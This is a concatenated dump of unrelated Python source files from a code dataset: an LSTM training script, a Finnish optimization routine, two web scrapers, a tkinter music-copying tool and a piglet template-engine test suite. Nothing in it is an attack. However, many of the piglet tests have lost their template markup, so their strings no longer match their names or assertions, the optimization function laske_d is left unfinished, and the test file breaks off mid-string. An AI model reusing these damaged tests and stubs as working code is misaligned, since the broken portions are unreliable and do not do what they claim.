X_train, Y_train\n\ndef loadmodel():\n\tif not os.path.isfile('%s_model.h5' % (model_filename)):\n\t\tmodel = network_utils.create_lstm_rnn(\n\t\tinput_shape = input_shape,\n\t\tnum_hidden_dimensions = config['hidden_dimension_size'],\n\t\tmax_hidden_dimension_size = config['max_hidden_dimension_size'],\n\t\tnum_recurrent_units = config['recurrent_units'],\n\t\tstateful = config['stateful'],\n\t\tlrate=.001)\n\telse:\n\t\tmodel = load_model('%s_model.h5' % (model_filename))\n\treturn model\n\n\"\"\"\nhttp://machinelearningmastery.com/using-learning-rate-schedules-deep-learning-models-python-keras/\t\"\"\"\ndef step_decay(epoch):\n\ttrain_progress = epochs_per_iter / float(cur_iter) + epochs_per_iter\n\tepochs_drop = 50.0 / train_progress\n\tdrop = 0.5\n\tinitial_lrate = .01 * train_progress\n\tdrop *= train_progress\n\tlrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n\tprint('Learning rate: %s' % lrate)\n\treturn lrate\n\ndef time_decay(epoch):\n\tinitial_lrate = .1\n\tlrate = initial_lrate * 1 / (1 + epoch)\n\tprint('Learning rate: %s' % lrate)\n\treturn lrate\n\ndef run_training():\n\tglobal cur_iter\n\tcur_iter = int(cur_iter)\t# sys.argv supplies a string; the loop below needs an int\n\t\n\tif not os.path.isdir(modelweight_dir):\n\t\tos.makedirs(modelweight_dir)\n\tplot_path = '%s_network_plot.png' % (model_filename)\n\tplot(model, show_shapes=True, to_file=plot_path)\n\tmodel.save('%s_model.h5' % (model_filename))\n\n\tlrate = LearningRateScheduler(time_decay)\n\tcheckpointer = ModelCheckpoint(filepath=model_filename, verbose=1)\n\tcallbacks_list = [checkpointer]\n\t\n\tprint ('Starting training!')\n\twhile cur_iter < num_iters:\n\t\tprint('Iteration: ' + str(cur_iter))\n\t\thistory = model.fit(\n\t\tX_train,\n\t\tY_train,\n\t\tbatch_size=batch_size,\n\t\tnb_epoch=epochs_per_iter,\n\t\tvalidation_split=0.0,\n\t\tshuffle=False,\n\t\tcallbacks=callbacks_list,\n\t\tverbose=1)\n\t\tcur_iter += epochs_per_iter\n\t\tmodel.save_weights(model_filename + str(cur_iter))\n\nif __name__ == '__main__':\n\t#Load up the training data\n\tprint ('Loading training data')\n\tX_train, Y_train = loadData()\n\tprint ('Finished loading training data')\n\tprint ('Learning data shape:')\n\tprint (X_train.shape)\n\t#Figure out how many frequencies we have in the data\n\tfreq_dims = X_train.shape[2]\n\tinput_shape = (batch_size, X_train.shape[1], freq_dims)\n\t\n\tprint ('Number of Frequency Dimensions: ', freq_dims, '\\nNumber of Hidden Dimensions: ', config['hidden_dimension_size'])\n\tprint ('Number of recurrent units: ', config['recurrent_units'])\n\t\n\t#Creates a lstm network\n\tmodel = loadmodel()\n\t\n\tprint ('Current iteration: ', cur_iter)\n\t\n\t#Load existing weights if available\n\tif os.path.isfile(model_filename + str(cur_iter)):\n\t\tmodel.load_weights(model_filename + str(cur_iter))\n\t\tprint ('Loaded model weights from %s' % (model_filename + str(cur_iter)))\n\telse:\n\t\tcur_iter = 0\n\t\n\trun_training()\n\n\tprint ('Training complete!')\n\texit()\t","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}\n+{"seq_id":"172482066","text":"# CSD optimization algorithm\r\n# Taneli Leppänen\r\n\r\nfrom scipy.optimize import minimize\r\nfrom math import sqrt\r\nimport numpy as np\r\n\r\n\r\ndef laske_d_pituus(d):\r\n    d_pituus = 0\r\n\r\n    for alkio in d:\r\n        d_pituus += alkio ** 2\r\n\r\n    d_pituus = sqrt(d_pituus)\r\n\r\n    return d_pituus\r\n\r\n\r\ndef pysayta(d, v, eps1, eps2):\r\n\r\n    d_pituus = laske_d_pituus(d)\r\n\r\n    if 
d_pituus < eps1 and v < eps2:\r\n return True\r\n\r\n else:\r\n return False\r\n\r\n\r\ndef laske_v(g_lista):\r\n\r\n v = 0\r\n\r\n for g in g_lista:\r\n\r\n if g > v:\r\n v = 0 + g\r\n\r\n return v\r\n\r\n\r\ndef laske_askel(R, x, d, v, delta, i_max):\r\n\r\n d_pituus = laske_d_pituus(d)\r\n d = d / d_pituus\r\n fitness0 = laske_fitness(x, R, v)\r\n m = 1\r\n print(\"Suunta: \" + str(d))\r\n\r\n while True:\r\n alpha = delta*(1.618**m)\r\n x1 = x + alpha*d\r\n fitness1 = laske_fitness(x1, R, v)\r\n\r\n if fitness1 > fitness0:\r\n\r\n if m < 2:\r\n m = 2\r\n\r\n break\r\n\r\n print(\"Piste = \" + str(x1))\r\n print(\"Fitness0 = \" + str(fitness0))\r\n print(\"Fitness1 = \" + str(fitness1))\r\n print(\"m = \" + str(m))\r\n print(\"Alpha = \" + str(alpha))\r\n\r\n fitness0 = 0 + fitness1\r\n m += 1\r\n\r\n input(\"Continue>\")\r\n\r\n alpha_y = delta*(1.618**m)\r\n alpha_a = delta*(1.618**(m-2))\r\n\r\n while True:\r\n vali = alpha_y - alpha_a\r\n\r\n if vali < i_max:\r\n return alpha_a\r\n\r\n a = vali*(1 - 0.618)\r\n b = vali*0.618\r\n\r\n fitness_a = laske_fitness((x + d*(alpha_a + a)), R, v)\r\n fitness_b = laske_fitness((x + d*(alpha_a + b)), R, v)\r\n\r\n if fitness_a < fitness_b:\r\n alpha_y = alpha_a + b\r\n\r\n else:\r\n alpha_a = alpha_a + a\r\n\r\n\r\ndef laske_d(x, g_arvot, nvars):\r\n\r\n g1 = [(1/(4*x[0]*x[1])) - ((x[0] + x[1])/(4*(x[0]**2)*x[1])),\r\n (1 / (4 * x[0] * x[1])) - ((x[0] + x[1]) / (4 * (x[1] ** 2) * x[0])),\r\n ]\r\n\r\n g2 = [(1 / (4 * x[0] * x[1])) - ((x[0] - x[1]) / (4 * (x[0] ** 2) * x[1])),\r\n (- 1 / (4 * x[0] * x[1])) - (x[0] - x[1]) / (4 * x[0] * (x[1] ** 2))\r\n ]\r\n\r\n c = np.array([3109888511975475/2199023255552, 3109888511975475/2199023255552])\r\n b = np.array(g_arvot)\r\n A = np.array([])\r\n\r\n\r\ndef paivita(x, d, alph):\r\n x = x + alph*d\r\n return x\r\n\r\ndef laske_rajoitusrikkomat(x):\r\n\r\n cons = [((2 * (2 ** 0.5) * 1000 * (x[0] + x[1]) * 10000) /\r\n (210000 * (4 * x[0] * x[1]) + 4 * x[0] * x[1])) - 0.5,\r\n ((2 * (2 ** 0.5) * 1000 * (x[0] - x[1]) * 10000) /\r\n (210000 * (4 * x[0] * x[1]))) - 1\r\n ]\r\n\r\n print(cons)\r\n\r\n return cons\r\n\r\ndef laske_fitness(x, R, v):\r\n\r\n fitness = (2**0.5)*1000*(x[0] + x[1])\r\n\r\n fitness += R*v\r\n\r\n return fitness\r\n\r\n\r\ndef main():\r\n\r\n nvars = 2\r\n x0 = [180, 180]\r\n eps1 = 0.01\r\n eps2 = 0.01\r\n R = 1000000\r\n delta = 10\r\n i_max = 0.01\r\n\r\n iter_max = 10\r\n\r\n x = x0\r\n\r\n for k in range(iter_max):\r\n\r\n g_arvot = laske_rajoitusrikkomat(x)\r\n v = laske_v(g_arvot)\r\n d = laske_d(x, g_arvot, nvars)\r\n\r\n if pysayta(d, v, eps1, eps2):\r\n print(\"Optimi pisteessa: \" + str(x) + \"\\n\" + \"Kierroksella: \" + str(k))\r\n break\r\n\r\n alpha = laske_askel(R, x, d, v, delta, i_max)\r\n x = paivita(x, d, alpha)\r\n\r\n\r\nmain()","sub_path":"csd_kultainen3.py","file_name":"csd_kultainen3.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"185228071","text":"\"\"\"\nTitle: Daily Cal Web Scraper\n\nDescription: Web scraper for the Daily Californian newspaper that provides headlines,\npublishing dates, and authors for recent articles.\n\nAuthor: Francis Indaheng\n\nDate: June 6, 2019\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n# web page to be scraped\nurl = \"https://www.dailycal.org/section/news/\"\n\n# create a GET request to the web page\nhtml = requests.get(url)\n\n# log request status\nrequest_status = \"Success\"\nif html.status_code != 
200:\n\trequest_status = "Error"\nprint(f"Request status code: {request_status}")\n\n# soupify the html content\nsoup = BeautifulSoup(html.content, "lxml")\n\n# find html wrapped by <h2> tag -> indicates section title\ntitle = soup.find("h2", {"class":"section-title"})\n\n# find news articles in section\narticles_arr = soup.find_all("a", {"rel":"bookmark"})\n\n# log section content\nprint(f"Section: {title.text[1:]}") # sliced title.text to remove observed newline\nfor article in articles_arr:\n\tprint(f"\\t{article.text}")\nprint()\n\ndef scrape_article(article):\n\turl = article.attrs["href"]\n\n\thtml = requests.get(url)\n\tsoup = BeautifulSoup(html.content, "lxml")\n\n\ttitle = soup.find("h2", {"class":"entry-title"}).text\n\tdate = soup.find("time", {"class":"entry-date"}).text\n\tauthor = soup.find("a", {"rel":"author"}).text\n\tcontent = soup.find("div", {"class":"entry-content"}).text\n\n\treturn (title, date, author, content[:250]) # truncate content if longer than 250 characters\n\nif __name__ == "__main__":\n\tprint("Title, Date, Author, Content (truncated)\\n")\n\n\tfor article in articles_arr:\n\t\tscraped_data = scrape_article(article)\n\t\tfor data in scraped_data:\n\t\t\tprint(data)\n\t\tprint()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}\n+{"seq_id":"107338322","text":"import os\nimport shutil\nimport tkinter as tk\nimport tkinter.filedialog as filedialog\nfrom pathlib import Path\n\nfrom mutagen import aiff, easyid3, flac\n\nimport config\nfrom concurrent import futures\n\n\ndef make_dist_path(tag):\n    if isinstance(tag, aiff.AIFF):\n        try:\n            artist = ','.join(tag["TPE1"].text).replace("/", "・")\n            album = ','.join(tag["TALB"].text).replace("/", "・")\n            return Path(artist + os.sep + album)\n        except:\n            print("必要なタグ情報がたりません")\n            return None\n    else:\n        try:\n            artist = ','.join(tag["artist"]).replace("/", "・")\n            album = ','.join(tag["album"]).replace("/", "・")\n            return Path(artist + os.sep + album)\n        except:\n            print("必要なタグ情報がたりません")\n            return None\n\n\ndef tag_scanner(music_path):\n    if music_path.suffix == ".aiff" or music_path.suffix == ".aif":\n        return aiff.AIFF(music_path)\n    elif music_path.suffix == ".flac":\n        return flac.FLAC(music_path)\n    elif music_path.suffix == ".mp3":\n        return easyid3.EasyID3(music_path)\n    else:\n        print("Invalid FileType")\n\n\nclass MusicTransfer:\n    def __init__(self):\n        self.cf = config.Config()\n        self.new_music = filedialog.askopenfilenames()\n        self.new_music = list(map(Path, self.new_music))\n        self.new_music_tags = [tag_scanner(music) for music in self.new_music]\n        # self.dist_path = [make_dist_path(tag) for tag in self.new_music_tags]\n        self.dist_path = []\n\n    def move_files(self):\n        for music, path in zip(self.new_music, self.dist_path):\n\n            player_dist = self.cf.player_main_path.joinpath(path)\n            if not player_dist.exists():\n                os.makedirs(player_dist)\n\n            backup_dist = self.cf.backup_path.joinpath(path)\n            if not backup_dist.exists():\n                os.makedirs(backup_dist)\n\n            with futures.ThreadPoolExecutor(max_workers=4) as e:\n                e.submit(shutil.copy2, music, player_dist)\n                e.submit(shutil.copy2, music, backup_dist)\n\n    def btn_clicked(self):\n        for i, e in enumerate(entries):\n            if e.get() != "":\n                self.dist_path.append(Path(e.get()))\n            else:\n                self.dist_path.append(make_dist_path(self.new_music_tags[i]))\n\n        self.move_files()\n\n\ndef main():\n    mt = MusicTransfer()\n    # mt.move_files()\n\n    root = tk.Tk()\n    root.title("Music Transfer")\n\n    frame1 = tk.Frame(root)\n    frame2 = tk.Frame(root)\n    frame1.pack()\n    frame2.pack()\n
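    # One grid row per selected file: a read-only label with the file stem on\n    # the left, and an Entry on the right for an optional manual override of\n    # the tag-derived destination path.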
labels = []\n    header1 = tk.Label(frame1, text="曲名")\n    header2 = tk.Label(frame1, text="出力先")\n\n    header1.grid(row=0, column=0)\n    header2.grid(row=0, column=1)\n\n    for nm in mt.new_music:\n        labels.append(tk.Label(frame1, text=nm.stem))\n    for i, label in enumerate(labels):\n        label.grid(row=i + 1, column=0)\n\n    global entries\n    entries = []\n    for i in range(len(labels)):\n        entries.append(tk.Entry(frame1))\n    for i, entry in enumerate(entries):\n        entry.grid(row=i + 1, column=1)\n\n    button = tk.Button(frame2, text="実行", command=mt.btn_clicked)\n    button.pack(anchor="e")\n\n    root.mainloop()\n\n\nif __name__ == "__main__":\n    main()\n","sub_path":"MusicTransfer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}\n+{"seq_id":"445075330","text":"import re\nfrom bs4 import BeautifulSoup\nimport requests\n# from gt import links\nimport csv\n\nurl = 'https://www.sanfoundry.com/1000-electronic-devices-circuits-questions-answers/'\np = requests.get(url)\ns = BeautifulSoup(p.text, 'html.parser') \naLink = s.find('div',{'class':'entry-content'})\nlinks = {bLink.text:bLink['href'] for bLink in aLink.find_all('a')}\n\n\nfor a,b in links.items():\n    page = requests.get(b)\n    soup = BeautifulSoup(page.text, 'html.parser')\n    i = soup.find('div',{'class':'entry-content'})\n    for x in i.find_all('p'):\n        try:\n            y = str(x).replace('\\n','')\n            question = re.search('^<p>\d.*', str(y)).group()\n            # print(question)\n            que = re.search('^<p>\d.*?<br/>a[)]',question).group()[3:-7]\n            # assumes the options 'a) ... e) ...' are <br/>-separated and are\n            # followed by '<br/>Answer'; the option list is recovered from that block\n            l = re.search('<br/>(a[)].*?)<br/>Answer', question).group(1).split('<br/>')\n            choices = '<br/><br/>'+'<br/>'.join(l)+'<br/>'\n            m = re.search('Answer: \\w+',question).group()[-1]\n            # print(l)\n            if m == 'a': ans = l[0]\n            elif m == 'b': ans = l[1]\n            elif m == 'c': ans = l[2]\n            elif m == 'd': ans = l[3]\n            elif m == 'e': ans = l[4]\n            expl = re.search('Explanation: .*',question).group()[:-6]\n            # print(que)\n            # print(len(choices))\n            # print(ans)\n            print(expl)\n            with open('elecdev.csv', 'a', encoding='utf-8') as csvfile:\n                print([que, choices, ans, expl, a, b])\n                writer = csv.writer(csvfile)\n                writer.writerow([que, choices, ans, expl, a, b])\n        except AttributeError: continue\n        except IndexError: continue\n","sub_path":"sanf_final.py","file_name":"sanf_final.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}\n+{"seq_id":"637502389","text":"# encoding=UTF-8\n#\n# Copyright 2016 Oliver Cope\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ast\nimport re\nimport sys\n\nimport astunparse\nimport pytest\n\nfrom piglet.exceptions import PigletError\nfrom piglet.template import Template\nfrom piglet.loader import TemplateLoader\nfrom piglet.test_loader import create_templates\nimport piglet.compile\n\n\ndef normspace(s):\n    return re.sub(r\"\\s+\", \" \", s, re.S).strip()\n\n\nclass TestTemplate:\n    def test_it_outputs_simple_template(self):\n        t = Template(\"$a\").render({\"a\": \"foo\"})\n        assert t == \"foo\"\n\n    def test_it_compiles_pyimport(self):\n        \"\"\"\n        py:import is hoisted to module level, meaning the template + loader\n        machinery must already be installed at compile time\n        \"\"\"\n        with create_templates(\n            [\n                (\"a\", u'<py:import href=\"b\" alias=\"b\"/>a says ${b.hello()}'),\n                (\"b\", u'<py:def function=\"hello\">hello world!</py:def>'),\n            ]\n        ) as d:\n            loader = TemplateLoader([d])\n            assert loader.load(\"a\").render({}) == \"a says hello world!\"\n\n    def test_builtins_are_accessible(self):\n        t = Template(\"${list(enumerate(range(2)))}\").render({})\n        assert t == \"[(0, 0), (1, 1)]\"\n\n    def test_it_compiles_an_empty_template(self):\n        assert Template(\"\").render({}) == \"\"\n\n    def test_it_compiles_if_node(self):\n        t = Template(\n            '<py:if test=\"animal == \\'cow\\'\">moo</py:if>' '<py:else>woof</py:else>'\n        )\n        assert t.render({\"animal\": \"cow\"}) == \"moo\"\n        assert t.render({\"animal\": \"dog\"}) == \"woof\"\n\n    def test_it_attaches_else_to_the_right_node(self):\n        t = Template(\n            '<py:if test=\"animal == \\'cow\\'\">moo</py:if>'\n            '<py:else>woof</py:else>'\n            '<py:if test=\"wishes == \\'fishes\\'\">bu-bu-bu</py:if>'\n        )\n        assert t.render({\"animal\": \"dog\", \"wishes\": \"dishes\"}) == \"woof\"\n        assert t.render({\"animal\": \"dog\", \"wishes\": \"fishes\"}) == \"woofbu-bu-bu\"\n        assert t.render({\"animal\": \"cow\", \"wishes\": \"dishes\"}) == \"moo\"\n        assert t.render({\"animal\": \"cow\", \"wishes\": \"fishes\"}) == \"moobu-bu-bu\"\n\n    def test_it_parses_escaped_symbols(self):\n        t = Template(\n            'wow!'\n            'try harder'\n            'meh.'\n        )\n\n        assert t.render({\"score\": 10}) == \"wow!\"\n        assert t.render({\"score\": 5}) == \"meh.\"\n        assert t.render({\"score\": 0}) == \"try harder\"\n\n    def test_it_escapes_interpolations(self):\n        t = Template(\"$foo\")\n        assert t.render({\"foo\": \"<html>\"}) == \"&lt;html&gt;\"\n\n    def test_it_doesnt_escape_pling_interpolations(self):\n        t = Template(\"$!foo\")\n        assert t.render({\"foo\": \"<html>\"}) == \"<html>\"\n        t = Template(\"$!{foo}\")\n        assert t.render({\"foo\": \"<html>\"}) == \"<html>\"\n\n    def test_it_compiles_for_node(self):\n        t = Template('<py:for each=\"x in xyzzy\">$x </py:for>')\n        s = t.render({\"xyzzy\": [\"plugh\", \"plover\", \"an old mattress\"]})\n        assert s == \"plugh plover an old mattress \"\n\n    def test_it_compiles_pychoose_with_choose_test(self):\n        t = Template(\n            '<div py:choose=\"i\">'\n            \"You have \"\n            '<py:when test=\"0\">none</py:when>'\n            '<py:when test=\"1\">only one</py:when>'\n            \"<py:otherwise>lots\"\n            \" and lots</py:otherwise>\"\n            \"</div>\"\n        )\n        assert t.render({\"i\": 0}) == \"<div>You have none</div>\"\n        assert t.render({\"i\": 1}) == \"<div>You have only one</div>\"\n        assert t.render({\"i\": 2}) == \"<div>You have lots and lots</div>\"
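    # (Assuming piglet follows the Genshi convention here: py:choose=\"i\"\n    # compares each py:when value against i, while an empty py:choose lets\n    # each py:when supply its own boolean test. The next test exercises the\n    # second form.)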

    def test_it_compiles_pychoose_without_choose_test(self):\n        t = Template(\n            '<div py:choose=\"\">'\n            \"You have \"\n            '<py:when test=\"i == 0\">none</py:when>'\n            '<py:when test=\"i == 1\">only one</py:when>'\n            \"<py:otherwise>lots\"\n            \" and lots</py:otherwise>\"\n            \"</div>\"\n        )\n        assert t.render({\"i\": 0}) == \"<div>You have none</div>\"\n        assert t.render({\"i\": 1}) == \"<div>You have only one</div>\"\n        assert t.render({\"i\": 2}) == \"<div>You have lots and lots</div>\"\n\n    def test_it_compiles_pycontent(self):\n        t = Template('<py:for each=\"x in xs\">' '<div py:content=\"x + 1\">y</div></py:for>')\n        assert t.render({\"xs\": range(3)}) == \"<div>1</div><div>2</div><div>3</div>\"\n\n    def test_it_compiles_pywith(self):\n        t = Template('<py:with vars=\"x=y; z=1\">${x}${y}${z}</py:with>')\n        assert t.render({\"y\": 5}) == \"551\"\n\n        t = Template('<py:with vars=\"x=y + 1\">$x</py:with>')\n        assert t.render({\"y\": 5}) == \"6\"\n\n    def test_it_compiles_python_pi(self):\n        t = Template(\"<?python foo('whoa nelly!') ?>\")\n        a = []\n        assert t.render({\"foo\": a.append}) == \"\"\n        assert a == [\"whoa nelly!\"]\n\n    def test_it_compiles_pi(self):\n        t = Template('')\n        assert t.render({}) == ''\n\n    def test_it_compiles_pydef(self):\n        t = Template(\n            '<py:def function=\"form(x)\">'\n            \"<div>$x</div>\"\n            \"</py:def>\"\n            '${form(\"hello world\")}'\n        )\n\n        assert t.render({}) == \"<div>hello world</div>\"\n\n    def test_pycall_calls_with_positional_args(self):\n        t = Template(\n            'foo: ${a()}'\n            ''\n            \"bar\"\n            \"\"\n        )\n        s = t.render({})\n        assert s == \"foo: bar\"\n\n    def test_pycall_calls_with_keyword_args(self):\n        t = Template(\n            'foo: ${a()}'\n            ''\n            'bar'\n            \"\"\n        )\n        s = t.render({})\n        assert s == \"foo: bar\"\n\n    def test_pycall_keywords_have_access_to_local_ns(self):\n        t = Template(\n            'foo: ${a()}'\n            ''\n            ''\n            '$x'\n            \"\"\n            \"\"\n        )\n        s = t.render({})\n        assert s == \"foo: 1\"\n\n    def test_pycalls_can_be_nested(self):\n        t = Template(\n            'foo: $a'\n            ''\n            ''\n            \"\"\n            \"\"\n        )\n        s = t.render({})\n        assert s == \"foo: baz\"\n\n    def test_unescaped_function_calls_dont_raise_an_error(self):\n        tt = Template(\n            '$!{bar()}'\n            '$x'\n            \"$!{foo()}\"\n        )\n        assert tt.render({\"x\": u\"café\"}) == u\"café\"\n\n    def test_it_compiles_pyattrs(self):\n        t = Template(\"x\")\n        s = t.render({})\n        assert s == 'x'\n\n    def test_it_compiles_pycomment(self):\n        t = Template('A$xB$yC')\n        s = t.render({})\n        assert s == \"ABC\"\n\n    def test_it_compiles_pytag(self):\n        t = Template('x')\n        assert t.render({\"x\": \"div\"}) == \"
x\"\n        assert t.render({\"x\": \"span\"}) == \"x\"\n\n        t = Template('    x')\n        assert t.render({\"x\": \"div\"}) == \"x\"\n\n        t = Template('x')\n        assert t.render({\"x\": \"div\"}) == \"x\"\n\n        t = Template('')\n        assert t.render({\"x\": \"amp-img\"}) == ''\n\n    def test_it_compiles_filter_node(self):\n        t = Template('x')\n        assert t.render({\"f\": lambda s: s.upper()}) == \"X\"\n\n        t = Template('x')\n        assert t.render({}) == \"X
\"\n\n def test_py_include_can_be_nested_in_py_def(self):\n with create_templates(\n [\n (\n \"a\",\n (\n u''\n u''\n u\"\"\n u\"${a()}\"\n ),\n ),\n (\"b\", u\"whoa nelly!\"),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"a\").render({}) == \"whoa nelly!\"\n\n\nclass TestPyBlock:\n def test_it_evalutes_pyblock_replacement(self):\n with create_templates(\n [\n (\"a\", u'A'),\n (\n \"b\",\n (\n u''\n u'B'\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == \"B\"\n\n def test_it_evalutes_pyblock_replacement_with_super(self):\n with create_templates(\n [\n (\"a\", u'A'),\n (\n \"b\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == \"B A\"\n\n def test_it_evaluates_nested_pyblocks_with_super(self):\n with create_templates(\n [\n (\n \"a\",\n (\n u''\n u\"Apage \"\n u'Ahead'\n u\"\"\n ),\n ),\n (\n \"b1\",\n (\n u''\n u'B'\n u\"\"\n ),\n ),\n (\n \"b2\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b1\").render({}) == \"B\"\n assert loader.load(\"b2\").render({}) == \"Apage B Ahead\"\n\n def test_it_evaluates_intermediate_supers_once_only(self):\n with create_templates(\n [\n (\"a\", (u'A')),\n (\n \"b\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n (\"c\", (u'')),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"c\").render({}) == \"B A\"\n\n def test_it_replaces_blocks_over_deep_hierarchy(self):\n with create_templates(\n {\n \"a\": u\"\"\"\n A INTRO\n \n A HEADING\n \"\"\",\n \"b\": u\"\"\"\n \n \n B CONTENT\n B HEADING\n \n \"\"\",\n \"c\": u\"\"\"\n \n C HEADING\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO B CONTENT C HEADING\"\n\n def test_it_replaces_blocks_over_deep_hierarchy2(self):\n with create_templates(\n {\n \"a\": u\"\"\"A INTRO \"\"\",\n \"b\": u\"\"\"\n \n B CONTENT\n B HEADING\n \n \"\"\",\n \"c\": u\"\"\"\n C HEADING\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO B CONTENT C HEADING\"\n\n def test_it_replaces_blocks_over_deep_hierarchy3(self):\n with create_templates(\n {\n \"a\": u\"\"\"A INTRO \"\"\",\n \"b\": u\"\"\"\"\"\",\n \"c\": u\"\"\"\n C\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO C\"\n\n def test_it_calls_super_over_deep_hierarchy(self):\n with create_templates(\n {\n \"a\": u\"\"\"A\"\"\",\n \"b\": u\"\"\"\n ${super()} B\"\"\",\n \"c\": u\"\"\"\n ${super()} C\"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A B C\"\n\n def test_it_keeps_defs_inside_extends(self):\n with create_templates(\n {\n \"a\": u\"\"\"A\"\"\",\n \"b\": u\"\"\"\n HELLO\n ${f()}\"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"b\").render({})\n assert normspace(s) == \"HELLO\"\n\n def test_template_render_calls_can_be_interleaved(self):\n \"\"\"\n Interleaving calls to templates can happen when one template calls\n another. Normally you'd do this with py:include, but sometimes it's\n useful to be able to render a sub template completely separately\n with its own context dict. 
Problem is the runtime.data.context\n has global scope, so the inner template stomps over the caller's\n context.\n\n NB it's tempting to pass __piglet_ctx around as a parameter to all\n template functions, removing the need for the threading.local entirely.\n However that entails either (A) requiring the user to add a\n __piglet_ctx parameter to every template function call or (B) requiring\n the user to use the syntax so we can hook into the call and\n inject the parameter, or (C) manipulating the ast to find function\n calls and autoinject parameters.\n\n (A) is clunky (and I don't like exposing __piglet_ctx to the user)\n (B) is simple but adds an inconsistency, and it annoys me that the\n regular python function call syntax wouldn't available for template\n functions.\n (C) might be possible - I got as far as implementing this for functions\n defined in the same template, but gave up for functions imported using\n .\n \"\"\"\n with create_templates({\"a\": u\"$x ${b()} $x\", \"b\": u\"$y$y$y\",}) as d:\n loader = TemplateLoader([d])\n a = loader.load(\"a\")\n b = loader.load(\"b\")\n s = a.render({\"x\": 2, \"b\": lambda: b.render({\"y\": 3})})\n assert s == \"2 333 2\"\n\n def test_pywith_on_extends_tag(self):\n \"\"\"\n Sometimes in a layout template you want to make an attribute\n customizable. Using py:block isn't possible\n (eg ```` is not well\n formed), so a workaround is::\n\n \n \n ...\n \n\n\n \n \n \n \"\"\"\n with create_templates(\n [\n (\"a\", u''),\n (\"b\", u''),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == ''\n\n def test_dynamic_pyextends(self):\n with create_templates(\n [\n (\"foo\", u\"
foo\"),\n                (\"bar\", u\"bar\"),\n                (\"main\", u''),\n            ]\n        ) as d:\n            loader = TemplateLoader([d])\n            assert loader.load(\"main\").render({\"t\": \"foo\"}) == \"foo\"\n            assert loader.load(\"main\").render({\"t\": \"bar\"}) == \"bar
\"\n\n\nclass TestExceptionHandling:\n def test_it_raises_compile_exception_at_template_line_number(self):\n for x in range(5):\n try:\n Template((\"\\n\" * x) + '')\n except PigletError as e:\n assert \"line {}\".format(x + 1) in str(e)\n else:\n assert False\n\n def test_it_raises_runtime_exception_at_template_line_number(self):\n for x in range(5):\n t = Template((\"\\n\" * x) + '')\n try:\n list(t({}))\n except ZeroDivisionError as e:\n assert \"line {}\".format(x + 1) in str(e)\n else:\n assert False\n\n def test_it_raises_exception_in_correct_file(self):\n with create_templates(\n [(\"a.html\", u''), (\"b.html\", u\"${1 / 0.0}\"),]\n ) as d:\n loader = TemplateLoader([d])\n try:\n loader.load(\"a.html\").render({})\n except ZeroDivisionError as e:\n assert \"b.html\" in str(e)\n else:\n assert False\n\n def test_it_raises_interpolation_exception_at_right_lineno(self):\n for x in range(1, 5):\n with create_templates(\n [\n (\"a.html\", u''),\n (\"b.html\", (u\"\\n\" * x) + \"${a.b}\"),\n ]\n ) as d:\n loader = TemplateLoader([d])\n try:\n loader.load(\"a.html\").render({\"a\": object()})\n except AttributeError as e:\n assert 'b.html\", line {}'.format(x + 1) in str(e)\n else:\n assert False\n\n\n@pytest.mark.skipif(\n sys.version_info < (3, 0), reason=\"astunparse output differs in py2\"\n)\nclass TestHoistVariables:\n def test_it_raises_an_error(self):\n mod = ast.parse(\"print(x)\")\n with pytest.raises(AssertionError):\n piglet.compile._hoist_variables_to_piglet_context(mod)\n\n def test_it_rewrites(self):\n mod = ast.parse(\"def foo():\\n\" \" yield x\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" x = __piglet_ctx.get('x', __piglet_rt.Undefined('x'))\\n\"\n \" (yield x)\\n\"\n )\n\n def test_it_doesnt_rewrite_assignments(self):\n mod = ast.parse(\"def foo():\\n\" \" x = 'foo'\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = 